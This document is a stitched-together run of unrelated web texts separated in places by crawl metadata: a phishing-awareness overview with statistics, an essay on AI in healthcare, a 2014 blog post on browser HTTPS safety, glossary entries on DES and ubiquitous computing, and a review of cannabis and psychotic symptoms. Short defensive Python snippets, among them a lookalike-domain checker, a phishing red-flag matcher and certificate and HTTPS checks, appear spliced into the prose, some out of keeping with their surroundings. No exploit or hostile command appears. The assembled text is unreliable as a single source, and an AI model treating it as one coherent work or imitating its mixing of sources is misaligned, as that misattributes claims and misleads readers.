Whaling, sometimes referred to as CEO fraud, is a type of attack that — much like in instances of spear phishing — focuses on a single target. However, whaling attacks usually aim to exploit high-ranking officials or other senior members in the organization to gain unauthorized access to sensitive financial data or computer systems.
Vishing and Smishing
The main thing that separates both Vishing and Smishing from other types of phishing attacks is that both are limited to a potential victim’s phone. Vishing refers to voice phishing. Think about scam calls impersonating a bank or offering lucrative investment opportunities. Smishing, on the other hand, is limited to text messages, but the aim of the attack, and the way it is designed is very similar to regular email phishing.
Today, phishing attacks are among the most common and dangerous types of cybercrime that businesses and individuals alike face on a daily basis.
A recent ESET study found a 7.3% increase in email-based phishing attacks between May and August 2021. Another study carried out by IBM discovered a 2% increase in phishing attacks between 2019 and 2020. The 2021 Verizon Data Breach Report noted that phishing attacks are involved in one way or another in about 36% of all breaches.
Over the years, phishing attacks grew not only in frequency but also in sophistication. While researchers at Tessian found that 76% of phishing emails did not contain malicious attachments, SonicWall’s 2021 Cyber Threat report discovered a steep increase in the numbers of malicious PDF and Microsoft Office files between 2018 and 2020. The increase likely corresponds to the fact that most people have a tendency to trust PDFs and MS Office documents. This trust is reflected in the fact that Microsoft is one of the most impersonated brands according to Check Point, which found that up to 43% of faux emails impersonated the tech giant. Other frequently impersonated organizations include DHL, Amazon, and LinkedIn.
Verizon’s report notes that in most instances of a phishing attack, the top compromised types of data are credentials such as passwords, PINs, and usernames; personal information such as full names and email addresses; and medical information, which includes insurance claims and social security numbers. The report also highlights that the median loss of a business email compromise stands at $30,000.
Cisco’s 2021 cybersecurity threat trends reports took a look at the most targeted industries and found that the financial services industry is at the top of phishers’ target list. Other often targeted industries include retail, manufacturing, food and beverage, research and development, and tech.
What are common indicators of a phishing attempt?
A large proportion of phishing scams focus on exploiting fear. Often a phishing email will inform users that there has been some kind of issue with their account. To solve the fake problem, the user is usually asked to click on a malicious link or download an attachment. As a result, unsurprisingly, most phishing emails use urgency in the subject line.
Attackers also focus on creating domains that can be very similar to a reliable brand’s domain. Bad actors will include branded logos to further fool unsuspecting users.
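One way defenders catch such lookalike domains is fuzzy string matching against a list of protected brands. The sketch below uses Python's standard difflib; the brand list and the 0.8 threshold are illustrative assumptions, not production values.

```python
import difflib

KNOWN_BRANDS = ["microsoft.com", "amazon.com", "dhl.com", "linkedin.com"]  # illustrative list

def lookalike_score(domain, known=KNOWN_BRANDS):
    """Return (closest_brand, similarity) for a sender's domain.
    High similarity to a brand the domain doesn't exactly match is a red flag."""
    best = max(known, key=lambda b: difflib.SequenceMatcher(None, domain, b).ratio())
    return best, difflib.SequenceMatcher(None, domain, best).ratio()

# "rn" imitating "m" is a classic homoglyph trick
brand, score = lookalike_score("rnicrosoft.com")
suspicious = brand != "rnicrosoft.com" and score > 0.8
```

Here "rnicrosoft.com" scores close to "microsoft.com" without matching it exactly, which is precisely the pattern a filter wants to flag.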
Catching a phisher
There are some typical red flags to look out for in most phishing emails.
The first thing to notice is whether the email uses your real name or not. If it addresses you as “dear customer” or “to whom it may concern,” you should be on the alert.
Phishing scammers will often send out huge batches of identical emails without targeting specific individuals. If a legitimate company reaches out to you, they'll almost always know your name.
The language used in phishing emails can also be a giveaway. Keep an eye out for odd turns of phrase, poor grammar, or obvious misspellings. A genuine email from your bank will not contain these kinds of errors.
Of course, the email sender’s address is also important. Check to make sure it looks legitimate. If there’s any doubt, check it against other emails you've received from the organization.
Lastly, be wary of urgency in the email. If someone demands money or presses you to click a link “before it’s too late,” that’s not a good sign. Criminals will often attempt to make the victim panic or rush to action without stopping to look closer at the email itself.
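The red flags above can also be turned into a crude automated screen. The toy heuristic below, whose patterns were chosen only to mirror the examples in this article, flags generic greetings, pressure tactics, and credential requests.

```python
import re

RED_FLAGS = {
    r"\bdear (customer|user)\b|\bto whom it may concern\b": "generic greeting",
    r"\burgent(ly)?\b|\bimmediately\b|\bbefore it'?s too late\b": "pressure to act fast",
    r"\bverify your (account|password|identity)\b": "credential request",
}

def phishing_red_flags(text):
    """Return the list of red-flag labels found in an email body (toy heuristic)."""
    lowered = text.lower()
    return [label for pattern, label in RED_FLAGS.items() if re.search(pattern, lowered)]

email = "Dear customer, verify your account immediately or it will be closed."
flags = phishing_red_flags(email)
```

A message that trips several of these at once deserves the slow, careful read described above; real mail filters use far richer signals, but the idea is the same.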
What happens if you click on a phishing link or download a malicious attachment?
If you happen to fall victim to a phishing scam, one of the things you can be almost sure of is that the attackers will let other scammers know that their attack on you was a success. In turn, you will most likely experience even more phishing attacks coming your way.
Falling victim to a phishing scam could also result in the loss of personal data such as your name, address, phone number, and other personally identifiable information, which in turn could lead to ever more issues such as identity theft.
A successful phishing attack on a business could result in a full-on data breach, which today could very well mean the end of the company.
How to prevent phishing
Slow down and think.
This is essential. Never hurry through an email and follow its instructions. Is someone urging you to immediately follow a link to collect prize money? Are you being told to go to a website to change your passwords as soon as possible? Slow down and make sure that the email is genuine first.
Don’t follow links directly.
Most phishing emails will ask you to click on a link. That could open the door to malware, viruses, and ransomware. Avoid this problem altogether by never following email links, unless they’re from a trusted, verified sender.
If you’re in doubt, open a new tab and navigate to the real company’s page. To be certain, you can even email or call the organization directly and ask if they contacted you recently.
Don’t trust your spam filters for everything.
Your email service will filter spam and junk mail into a separate box to be deleted later, but it doesn’t always catch everything. Don’t assume that something is automatically safe just because it hasn’t been caught by the filters. Errors like this happen all the time, so be careful.
Ask yourself whether you’ve had previous contact with the sender.
If a bank you don’t have an account with emails you asking you to log in to your account, that’s a sure sign you’re being targeted. Most phishing emails are sent in the hope that you’ll click on the link without thinking. Ask yourself if you actually have an account or relationship with the company the sender claims to represent. If the answer is no, ignore or delete the message.
Phishing emails can be highly effective, and they’re one of the oldest internet scams in the book. The best defense against them is vigilance and some common sense.
In retail, the use of AI and Machine Learning is about driving sales and ROI. In education, it’s about student engagement and learning. In hospitality, it’s about guest services. In healthcare, it’s about saving lives. Medical errors are the third-leading cause of death after heart disease and cancer. By leveraging AI and Machine Learning we can minimize errors, save lives, and conserve resources at the same time.
Virtual nursing assistants can reduce unnecessary patient hospital visits and lower the burden on the medical staff. For routine monitoring of levels, dosages, and checkups, the use of AI can monitor patients after they leave the hospital and lower re-admittance rates.
Back in 2017, Apple and Stanford unveiled a heart study program using the Apple Watch’s heart rate sensor to collect data on irregular heart rhythms and notify users who may be experiencing atrial fibrillation (AFib). AFib, the leading cause of stroke, is responsible for approximately 130,000 deaths and 750,000 hospitalizations in the US every year. Many people don’t experience symptoms, so AFib diagnosis is often missed. As we live in a more connected world, by putting Machine Learning to work on mass amounts of anonymized medical information, doctors and researchers can learn about new diseases, new trends, and build new medications.
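The study's actual models are not public, but the core idea of spotting an irregular rhythm can be sketched with one simple statistic: the coefficient of variation of the intervals between heartbeats (RR intervals). The interval values and the 10% threshold below are made-up illustrative numbers, not clinical ones.

```python
import statistics

def rhythm_irregularity(rr_intervals_ms):
    """Coefficient of variation of RR intervals; AFib-like rhythms tend to score high."""
    mean = statistics.mean(rr_intervals_ms)
    return statistics.stdev(rr_intervals_ms) / mean

steady = [800, 810, 790, 805, 795, 800]        # ~75 bpm, nearly regular
erratic = [620, 980, 710, 1150, 540, 870]      # highly variable intervals

regular_cv = rhythm_irregularity(steady)
afib_like_cv = rhythm_irregularity(erratic)
flagged = afib_like_cv > 0.10 > regular_cv     # illustrative 10% threshold
```

A wearable collecting thousands of such intervals per day can surface the erratic pattern for a physician to review, which is the kind of screening the heart study automated at scale.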
Using AI to diagnose patients is undoubtedly in its early stages, but there have been some interesting use cases. A Stanford University study used an AI project to detect skin cancer against dermatologists, and it performed at the same level as humans. As more information is collected, it’s likely that AI diagnosis will become even more accurate over time.
Using AI and Machine Learning is going to allow us to learn more and more about how diseases respond to medicine, how diseases form, and what we can do to prevent them. Plain and simple: lives will be saved in the future because of AI and Machine Learning in healthcare.
The Internet is a dangerous place, full of areas that can get you into trouble. Time and time again I see people who are not aware of these dangers get themselves, their homes, and their places of work into trouble. All it takes is a bad link to a website that looks legit to ruin your day. Identity theft, malware, viruses, or worse can happen without your knowledge until the damage is done, unless you are careful. I wanted to write a series of posts that covers the basics of Internet use. Think of it as Internet Safety 101. The more you know, the more aware you can be when you come across something that appears fishy or out of place. More importantly, I hope that this series of posts is simple enough in explanation that you can send it out to those you know who are not as savvy in Internet lingo. They are the ones that will get bit by a mistake.
This blog entry is about Internet browsers: the tools used to access all the webpages, email, games, social sites, and videos that you consume. The screenshots in this post are from Internet Explorer 10, but all the browsers function similarly and let you view the same information. There are many software tools you can use to browse the Internet. I will direct the average user to the top four, my preferred browsers.
When you browse to a webpage it is important to know that there are two basic security modes of a webpage. HTTP and HTTPS. HTTP is an un-encrypted method that most websites use for general display. HTTPS is the encrypted, secure method. In the browser here’s how you can tell the difference and I will explain why this is critical to know this information.
For no particular reason I will use Bank of America’s website as the example. In the address bar, the text box at the top where the web address is, you will see http:// or https:// before the www.site.com address. This is the first piece of information to check to ensure the security level of a website. Any website that handles your financial, personal, business, or other protected data should ALWAYS be HTTPS. NEVER log in on a page served over HTTP. The reason is that if a hacker is watching that traffic, your username and password can be seen in clear text, wide open for anyone to grab. HTTPS encrypts, or scrambles, the text so only the website can understand and read it.
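That "check the address bar first" habit is simple enough to express in code. A minimal sketch using Python's standard urllib, where the bank URL is just an example address:

```python
from urllib.parse import urlparse

def is_safe_for_login(url):
    """A login page must be served over HTTPS; anything else is a no-go."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and bool(parsed.hostname)

# The padlock habit, in code form:
safe = is_safe_for_login("https://www.bankofamerica.com/login")
unsafe = is_safe_for_login("http://www.bankofamerica.com/login")
```

The same two-line check, scheme plus hostname, is the first thing password managers and browser warnings look at before letting credentials anywhere near a page.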
The second step is to validate the information behind the HTTPS security. There is a component called a certificate that sits on those servers. The certificate is what handles the encryption. Clicking on the green bar brings up the certificate information. Today’s browsers provide enough links and information to help you determine whether you can trust a website.
This box will tell you whether the certificate is trusted, who issued it, and who it was issued to. If you click on View certificates you will get more information to establish the credibility of the security. Most of the time you don’t need to check this, but it’s there if you want to, especially on new websites you are not familiar with.
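If you want to go beyond eyeballing that pop-up, Python's standard ssl module can express one of the same validity checks a browser performs. The function below takes a certificate in the dictionary shape returned by ssl.SSLSocket.getpeercert(); the sample dates are made up for illustration.

```python
import ssl
import time

def cert_is_current(cert, now=None):
    """Validity-window check for a getpeercert()-style certificate dict."""
    now = time.time() if now is None else now
    not_before = ssl.cert_time_to_seconds(cert["notBefore"])
    not_after = ssl.cert_time_to_seconds(cert["notAfter"])
    return not_before <= now <= not_after

sample_cert = {  # same shape as ssl.SSLSocket.getpeercert(); dates are made up
    "notBefore": "Feb 16 00:00:00 2024 GMT",
    "notAfter":  "Feb 16 00:00:00 2026 GMT",
}
```

A browser performs this expiry check, plus chain-of-trust and hostname checks, on every HTTPS connection before showing you the green bar.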
NOTE – Just because the website looks like your bank’s, always check the address bar to make sure. Anyone can make a webpage look like your bank’s. Unless you slow down and do these simple verifications, you may be freely giving your username and password to a phishing website. This is how simple it is to get into trouble. The majority of identity thefts are not accomplished through true front-door hacking; they are socially engineered by tricking users into entering their security information into a site that looks legit but is not.
HTTPS should always be used for any bank. If you don’t see HTTPS, get off the page immediately. Even Facebook switched over to HTTPS as the default for their site.
Your Internet browser will tell you everything you need to know about a site you are visiting, but it won’t tell you whether it’s where you intended to be. Sometimes the built-in blockers will warn you if the site is dangerous, but never rely on that. You are responsible for knowing where you are going and where you are putting your critical credentials.
That’s the basic Internet security overview 101: how to decide whether to trust a site. The best practice is, if you are unsure, lean toward safety and don’t use it. In later posts I will detail the practice of using multiple email addresses and user IDs for the different kinds of websites you use. No matter where you go, the browser is the first line of defense for your protection. Never assume.
The last point I want to make, and this goes for any type of software, is to stay current with updates. All of the browser makers release updates regularly to address bugs and to continually improve the security strength of their products. Hackers are always trying to find holes to exploit to get at your data, so the more up to date you stay, the better protected you remain.
Share this with your less tech-savvy family members; get them to read and learn about the Internet beyond Candy Crush on Facebook. One day they may click on something and unknowingly hand over the username and password to their bank, and before they realize it their accounts will be drained to zero.
Like the old ’80s shows and PSAs would say: knowledge is power, the more you know, knowing is half the battle, and so on.
End of Line.
Binary Blogger has spent 20 years in the Information Security space currently providing security solutions and evangelism to clients. From early web application programming, system administration, senior management to enterprise consulting I provide practical security analysis and solutions to help companies and individuals figure out HOW to be secure every day. | <urn:uuid:a39f7e61-8896-4d4e-b6c5-54a9bb4c5c0a> | CC-MAIN-2022-40 | https://binaryblogger.com/2014/03/03/safer-internet-use-browsers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00365.warc.gz | en | 0.943682 | 1,200 | 2.796875 | 3 |
Data Encryption Standard (DES)
Data Encryption Standard (DES) is a symmetric block cipher that was once the US Government’s gold standard for encrypting sensitive data. DES was succeeded by the Advanced Encryption Standard (AES) when, in the face of adversaries’ more potent brute-force capabilities, DES was deprecated.
IBM developed DES in the 1970s based on Horst Feistel’s earlier design. It was submitted to the US Government’s precursor to the National Institute of Standards and Technology (NIST) in response to calls for a data-protection algorithm. In 1976 the NIST precursor consulted with the National Security Agency (NSA) and adopted a modified version that became DES.
The five-year competitive process that NIST used to create AES (1997-2000) was far more collaborative, transparent, and open than the one used for DES. The latter process was rather closed and this harmed its reputation, as did suspicions that the NSA sought a backdoor to DES.
DES’s viability suffered as a result of a modification that increased its resistance to differential cryptanalysis but diminished its resistance to brute-force attacks. On the whole, DES’s short key length of 56 bits made it short-lived in the face of rapid developments in computing, including in the cracking of encryption.
A symmetric cipher is one that uses the same key for encryption and decryption. Aside from DES and AES, notable examples of symmetric ciphers include Blowfish and International Data Encryption Algorithm (IDEA). | <urn:uuid:108bbbe2-e257-4774-9a4a-8964f2406e70> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/data-encryption-standard-des | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00365.warc.gz | en | 0.95155 | 326 | 3.71875 | 4 |
Ubiquitous Computing is a term associated with the Internet of Things (IoT) and refers to the potential for connected devices and their benefits to become commonplace.
Also called ambient computing or pervasive computing, ubiquitous computing can be described as the saturation of work, living, and transportation spaces with devices that intercommunicate. These embedded systems would make such settings considerably more enjoyable and convenient through contextual data aggregation and application, seamless and intuitive access points, and fluid payment systems.
A prime example of a ubiquitous computing experience would be an autonomous vehicle that recognizes its authorized passenger through smartphone proximity, docks and charges itself when needed, and handles toll, emergency response, and fast-food payments itself by communicating with infrastructure.
“The dystopian sci-fi film ‘Minority Report’ depicted an unhappy future of ubiquitous computing abuses. The saturation of devices, passive biometric scans, and tracing of people according to their various forms of identification was overwhelming by our standards as we are just beginning to usher in the IoT.” | <urn:uuid:8a43a07d-7f15-4e9c-bdb1-6aab9aaebe1c> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/ubiquitous-computing | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00365.warc.gz | en | 0.943168 | 219 | 3.421875 | 3 |
Researchers from King’s College London have investigated the impact of short-term use of two important psychoactive constituents in cannabis on healthy volunteers: delta-9-tetrahydrocannabinol (THC) and cannabidiol (CBD).
By analysing the results from 15 studies involving a total of 331 participants, the research showed that a single dose of THC could induce psychiatric symptoms in people with no history of psychotic or other major psychiatric disorders.
Published in Lancet Psychiatry, the research considered the effects of THC and CBD on different types of psychiatric symptoms.
The study, which only included research on healthy volunteers, showed that the largest effect of THC compared to a placebo was recorded for general symptoms which included depression and anxiety (effect size of 1.01).
For positive symptoms, such as delusions and hallucinations which are often experienced in schizophrenia, the acute administration of THC showed an effect size of 0.91 across the studies, whilst for negative symptoms such as blunted affect and lack of motivation, there was an effect size of 0.78.
Statistically, all three of these effect sizes are described as large, indicating that a single dose of THC induces all three types of psychiatric symptom to a degree considered clinically important.
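The effect sizes quoted here are standardized mean differences (Cohen’s d): the difference between the THC and placebo group means divided by the pooled standard deviation, with d ≥ 0.8 conventionally labelled “large”. A minimal sketch with invented symptom scores (the numbers below are illustrative, not taken from the meta-analysis):

```python
import math

def cohens_d(group_a, group_b):
    """Standardized mean difference using the pooled standard deviation."""
    na, nb = len(group_a), len(group_b)
    mean_a = sum(group_a) / na
    mean_b = sum(group_b) / nb
    var_a = sum((x - mean_a) ** 2 for x in group_a) / (na - 1)
    var_b = sum((x - mean_b) ** 2 for x in group_b) / (nb - 1)
    pooled_sd = math.sqrt(((na - 1) * var_a + (nb - 1) * var_b) / (na + nb - 2))
    return (mean_a - mean_b) / pooled_sd

# Hypothetical post-dose symptom scores for a THC group vs a placebo group.
thc_scores = [14, 16, 15, 18, 17, 13]
placebo_scores = [10, 12, 11, 13, 12, 10]
print(f"d = {cohens_d(thc_scores, placebo_scores):.2f}")  # d = 2.64, past the 0.8 'large' cutoff
```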
Cannabis is one of the most widely used psychoactive substances worldwide, with 6-7% of the population in Europe using it every year, over 15% in the USA and around 188 million people globally.
The drug has been legalised in 11 US states, Canada and Uruguay and policymakers elsewhere are deliberating whether to allow the medicinal use of cannabis products.
Four of the 15 studies examined the effects of CBD on psychiatric symptoms induced by THC in healthy volunteers. Analysis of these studies showed that CBD did not induce any of the three types of psychiatric symptoms. There was no consistent evidence across the four studies that CBD moderates the effects of THC in healthy volunteers.
The doses of THC in the meta-analysis ranged from 1.25mg to 10mg, leading to peak THC blood levels of 4.56 to 5.1 ng/ml when orally administered and 110-397 ng/ml when injected or inhaled.
These blood levels are comparable to those seen shortly after smoking a single typical cannabis joint containing 16-34mg of THC.
Senior author Professor Oliver Howes, from the Institute of Psychiatry, Psychology & Neuroscience (IoPPN), King’s College London, said: ‘By analysing the results of studies that only consider the effects of THC on people who have not experienced mental health problems, our research provides evidence that after taking THC-containing cannabis just once it is possible to experience psychiatric symptoms, some of which are akin to those seen in schizophrenia.
‘What isn’t clear from our research is how long-standing or distressing these symptoms could be, which will be important to assess when considering any long-term impact on mental health.
‘Our study has some implications not only in terms of legalising cannabis but also in terms of the use of medical cannabis products which may contain THC.
With the THC:CBD ratio increasing in street cannabis it is important for further research to investigate the effect of different ratios on psychiatric symptoms and mental health and, for those thinking about the use of medical cannabis, to discuss potential risk with medical professionals.’
Researchers considered a range of important variables that could moderate the effects of these two cannabis constituents. Their analysis showed that intravenous administration of THC was associated with greater positive symptoms than inhaled THC, and that positive symptoms induced by THC were lower in tobacco smokers compared to those who did not smoke tobacco.
Researchers highlighted that the association between tobacco use and effect of THC on positive symptoms should not be interpreted as a recommendation to use tobacco to counter the effects of THC.
Tobacco smoking is associated with lower levels of the receptor in the brain to which THC binds called the cannabinoid 1 receptor (CB1R), which could mean smokers are less sensitive to effects of THC.
An increase in age was associated with more negative symptoms induced by THC. Sex, dose, current cannabis use, frequency of cannabis use and type of THC had no moderating impact on the effects.
Contributing author, Dr Faith Borgan from the IoPPN said: ‘THC acts on the brain by binding to a protein called the cannabinoid 1 receptor (CB1R). Our finding that schizophrenia-like symptoms can be induced by THC adds to existing evidence that there is a potential role of the CB1R in schizophrenia.
This receptor is altered in patients with schizophrenia who do not use cannabis, and greater alterations of the receptors are linked to more severe positive, negative, and general symptoms in patients.
‘CBD did not consistently block the adverse effects of THC. More work is needed to identify which doses of CBD should be used since only a low proportion of the compound can be absorbed, owing to its low levels of bioavailability.
There is also a need for future work to identify the mechanisms underlying the effects of CBD, and the effects of cannabis with varying THC:CBD ratios.’
The authors highlight several limitations to their study. Their finding that psychotic symptoms were not moderated by level of dose or by prior cannabis use contrasts with results from several studies and may reflect limited power in the analysis.
They suggest that further work is needed to clarify the effects, particularly at the level of individual symptoms.
The authors identified potential publication bias, where significant findings are more likely to be published than lower effect sizes. However, they found that the better the quality of the study, the greater the effect size, suggesting that their results – which also included lower quality studies – may in fact underestimate the size of the effect of THC on inducing symptoms.
Cannabis use is common and becoming more so. There were an estimated 192.2 million users aged 15–64 worldwide in 2016, a 16% increase compared to 2006.
Legalization of cannabis for medical use has contributed to this increase. In the United States, states that have passed medical cannabis laws have seen greater increases in illicit cannabis use and in cannabis use disorders compared to states that have not.
As use has increased, population-level perceptions of the harmfulness of cannabis have decreased. Tetrahydrocannabinol (THC) is usually considered the active ingredient, but cannabidiol (CBD), several other cannabinoids, and terpenoids also play a role in the pharmacology of cannabis.
Cannabis use has been associated with psychotic symptoms and disorders including schizophrenia across many populations and in many different study designs [6,7,8,9]. The nature of this association is complex and can be rife with confounders.
This is especially so when looking at long-term psychotic outcomes related to cannabis use. There has been debate in the literature as to whether cannabis use is a causative factor for schizophrenia or whether the association between the two rather represents some shared vulnerability to both [8,10].
Another putative reason for the association has been that cannabis use represents an attempt by people with emerging psychosis to self-medicate their symptoms, though recently this has been falling out of favor as a primary explanation [7,9].
While this review focuses on cannabis proper we should note before moving on that synthetic cannabinoid use is a growing clinical concern due to the significant prevalence and potential for severe health effects beyond what is seen with cannabis [11,12].
A 2013 survey of 50,000 US high school students reported past-year synthetic cannabinoid use in 6.4% of students, compared to past-year cannabis use in 25.8%. In 2012 the US Army Substance Abuse Program randomly collected 10,000 urine samples and tested them for synthetic cannabinoids.
That study reported a 2.5% positivity rate. Synthetic cannabinoids are not tested for on routine clinical urine drug screens and so will often go undetected, even in substance abuse treatment settings.
Part of the difficulty here is that a large and increasing number of distinct synthetic cannabinoids with diverse chemical structures are constantly being synthesized, making it difficult to develop assays for everyday clinical use.
Compare this with cannabis, which is the easiest substance of abuse to “catch” on urine drug screens. This difficulty of detection, along with governmental difficulty in efficiently identifying and legally controlling each new synthetic cannabinoid, draws many people to them.
Synthetic cannabinoids are, sometimes dramatically so, associated with psychosis. In regular cannabis use, THC, a low-affinity partial agonist at the CB1 receptor, produces many of the effects of cannabis use. In contrast, synthetic cannabinoids are high-affinity full agonists at the CB1 receptor.
Given this, it is not surprising that any deleterious effects from the former could be seen with greater severity and frequency with the latter. Indeed, much has been written about the harmful effects of synthetic cannabinoids including risk of psychosis [11,12,15,17,18,19,20,21].
The term psychosis in clinical settings refers to a plethora of abnormalities. Psychotic symptoms occur over a spectrum from acute to chronic and from mild to severe. Manifestations of psychosis are commonly broken down into “positive” and “negative” symptoms.
Positive symptoms include delusions, hallucinations, disorganized thinking/speech/behavior, and disorganized or abnormal motor behavior. Negative symptoms include diminished emotional expression, avolition, alogia, anhedonia, and asociality (pp 87–89).
Positive symptoms are abnormal by their presence whereas negative symptoms represent abnormalities via absence of normal behaviors. Most of the reported associations between cannabis and psychosis, particularly for acute effects of cannabis use, focus on positive symptoms. However, there is some evidence of acute effects resembling negative symptoms as well [23,24].
Psychosis is a symptom, whereas schizophrenia is a chronic, lifelong illness characterized by the presence of severe psychotic symptoms [22,25] (pp. 99–105). In addition to the chronicity required for a schizophrenia diagnosis, the concept of “first rank” psychotic symptoms has historically been used to help differentiate schizophrenia from other psychotic conditions.
First rank psychotic symptoms are relatively severe and are somewhat specific for schizophrenia [27,28]. They include auditory hallucinations, delusional perceptions, experiences of thought interference, and passivity experiences [26,27]. Schizophrenia can lead to a devastating impairment in quality of life.
Schizophrenia was responsible for 13.6 million disability-adjusted life years worldwide in 2010. Because schizophrenia confers extremely high morbidity and mortality, it is understandable that so much attention has been paid to whether cannabis use increases one’s risk of developing it.
Cannabis is associated with a range of psychotic symptoms of widely variable severity. Cannabis is also associated with psychotic symptoms of widely variable timeframes. Cannabis-associated psychosis can be seen on the order of minutes, hours, days, or weeks in addition to the months and years timeframe seen in a schizophrenia diagnosis [6,31,32].
A holistic understanding of the link between cannabis and psychosis requires us to look at more than just schizophrenia. For the current review we will describe the association between cannabis and psychosis as it plays out in the context of three Diagnostic and Statistical Manual of Mental Disorders, fifth edition (DSM-5) diagnoses: Cannabis Intoxication, Cannabis-Induced Psychotic Disorder (CIPD), and Schizophrenia .
It is useful to use this lens because the DSM-5 criteria are very widely used and accepted. This gives us firmer footing to describe different “kinds” of cannabis-associated psychotic experiences than we would have otherwise.
Delineating the plethora of cannabis/psychosis associations in the literature into these categories is merely meant as a useful way to conceptualize the associations and is not meant to strictly indicate the original works referenced in this review themselves were working with DSM-5 criteria.
No single diagnostic framework is used consistently in the cannabis/psychosis literature with DSM-III, DSM-IV, DSM-5, ICD-8, ICD-9, and ICD-10 diagnoses all being used at different times as well as the use of a variety of clinical psychosis rating scales.
Cannabis Intoxication
This is a diagnosis made when there is recent cannabis use; significant behavioral or psychological changes that developed during or shortly after cannabis use; and physical stigmata of intoxication such as conjunctival injection or dry mouth (p. 516). With respect to timing, cannabis intoxication occurs within minutes for inhalational use, but onset can take hours when cannabis is ingested.
The symptoms typically last 3–4 hours but, depending on dose and tolerance, can persist up to 24 hours. This is essentially the standard cannabis “high”, documented in the DSM-5 as a mental disorder in situations where it causes problematic neuropsychiatric symptoms.
Psychotic symptoms are not necessary for a cannabis intoxication diagnosis but can be part of the disorder with the caveat that insight must remain intact and the psychotic symptoms must not be sufficiently severe or persistent enough to warrant clinical attention for their own sake.
If the symptoms are severe or persistent enough to warrant clinical attention for their own sake, then that would move us to a CIPD diagnosis. CIPD is discussed in the following section.
Most individuals meeting criteria for Cannabis Intoxication will not present for acute medical care, so looking at psychotic symptoms within this disorder gives us a sense of what psychotic symptoms can be associated with cannabis use in non-clinical populations.
We can also note that the vast majority of worldwide cannabis users have at some point met criteria for a Cannabis Intoxication diagnosis (becoming intoxicated is to some degree the goal of any cannabis use), so the psychotic symptoms experienced therein have the potential to affect a huge number of persons worldwide.
Having described what Cannabis Intoxication is per the DSM-5, we can look at the evidence associating cannabis and psychosis as might be seen within the parameters of this disorder.
A 2004 double-blind placebo-controlled experimental study by D’Souza et al. that documented psychotic symptoms in healthy subjects after intravenous THC administration provides a straightforward and useful example.
By administering the Positive and Negative Syndrome Scale (PANSS) at different timepoints before and after intravenous THC administration, the transient or “intoxication” effects of THC with respect to psychotic symptoms could be followed. The PANSS is commonly used in research to monitor symptoms of psychosis.
The PANSS was administered 60 minutes prior to injection, 10 minutes after, 80 minutes after, and 200 minutes after. It was found that a modest mean increase in positive symptoms occurred and peaked 10 minutes after injection and returned to baseline by 200 minutes after injection.
A transient increase in mean negative symptoms also was seen after injection and again symptoms returned to baseline by 200 minutes. Due to the study design using intravenous THC as opposed to inhaled or ingested THC the results seen here show quicker on/off effects than what would be experienced in the population at large where inhalation or ingestion are the common administration routes.
The transient increases seen in this study in both positive and negative symptoms measured via PANSS peaked at approximate scores of 10. Putting these results in context the possible PANSS scores for either positive or negative symptom subscales are 7 to 49 and PANSS averages for schizophrenic persons have been reported at 18.2 for positive symptoms and 21.01 for negative symptoms .
So, we see that while increases in psychotic symptoms were seen in this study using healthy subjects the magnitude of symptoms was quite small and transient as mentioned above. Also, it is notable that a dose–response relationship was seen in this study with more psychotic symptoms occurring with 5 mg THC injection compared to 2.5 mg THC injection.
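The 7–49 subscale range mentioned above follows directly from the PANSS structure: the positive and negative subscales each contain seven items, rated from 1 (absent) to 7 (extreme). A small sketch (the example ratings are hypothetical, chosen to land near the study’s ~10 peak):

```python
# Each PANSS positive/negative subscale: 7 items, each rated 1 (absent) to 7 (extreme).
ITEMS_PER_SUBSCALE = 7
MIN_SCORE = ITEMS_PER_SUBSCALE * 1   # 7  -> every symptom absent
MAX_SCORE = ITEMS_PER_SUBSCALE * 7   # 49 -> every symptom extreme

def subscale_score(ratings):
    """Sum the item ratings after checking they are valid PANSS values."""
    assert len(ratings) == ITEMS_PER_SUBSCALE
    assert all(1 <= r <= 7 for r in ratings)
    return sum(ratings)

# Hypothetical positive-symptom ratings: mostly absent, a few mild.
print(subscale_score([2, 2, 1, 2, 1, 1, 1]))  # 10
```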
This finding of an acute transient increase in psychotic symptoms after intravenous THC administration in healthy subjects was replicated by Morrison et al. in 2009. In human laboratory studies of healthy individuals administered THC at high doses, it has been estimated that 35–50% will experience psychotic symptoms.
The largest pool of evidence describing acute transient psychotic symptoms associated with cannabis use can be found in studies documenting general population cannabis users self-reported psychotic experiences during acute use.
This data also gives us some sense of the proportion of cannabis users who experience psychotic effects acutely when using the drug in naturalistic settings. A 2003 review by Green et al. examined 12 studies that surveyed users’ subjective effects when using cannabis.
Three of the studies used open-ended questions to elicit subjective effects while nine studies used closed-ended questioning (checklists or questionnaires). All studies used had a sample size over 30. The open-ended studies found 2–14% of subjects reported hallucinations while 6–15% of subjects reported paranoia.
The closed-ended questioning studies allowed for results to be combined when the surveys asked similar or identical questions about subjective effects of cannabis. Of subjects in closed-ended questioning studies, 19.8% reported hallucinations/visions (N = 3082), while 51.4% reported paranoia (N = 2708).
It is interesting to note that closed-ended questioning elicited more psychotic symptoms than open-ended questioning. Cannabis users were seen throughout these studies to endorse mostly beneficial effects when describing effects spontaneously and to endorse proportionally more harmful/bothersome effects when made to consider these via checklists and questionnaires.
This is congruent with the cognitive biases typically associated with substance use disorders, and it is interesting to see it even in this non-clinical population.
There is also evidence from a study by Sami et al. that former cannabis users were more likely to report having had psychotic experiences with cannabis than current cannabis users, who were more likely to report pleasurable experiences.
Current users who indicated a future intention to quit were more likely to have had psychotic experiences with cannabis than current users who indicated no desire to quit. These findings (along with the differences Green et al. reported with open vs closed questions) suggest a potential “in” for insight-driven interventions, such as motivational interviewing, to help people quit cannabis.
As it is clear many users do not report psychotic effects from acute cannabis use, it becomes important to ask what kind of person is at risk for these bothersome acute effects. Mason et al. looked at acute psychotic symptoms associated with cannabis use and stratified their cannabis users based on high or low pre-intoxication scores on the Schizotypal Personality Questionnaire (SPQ).
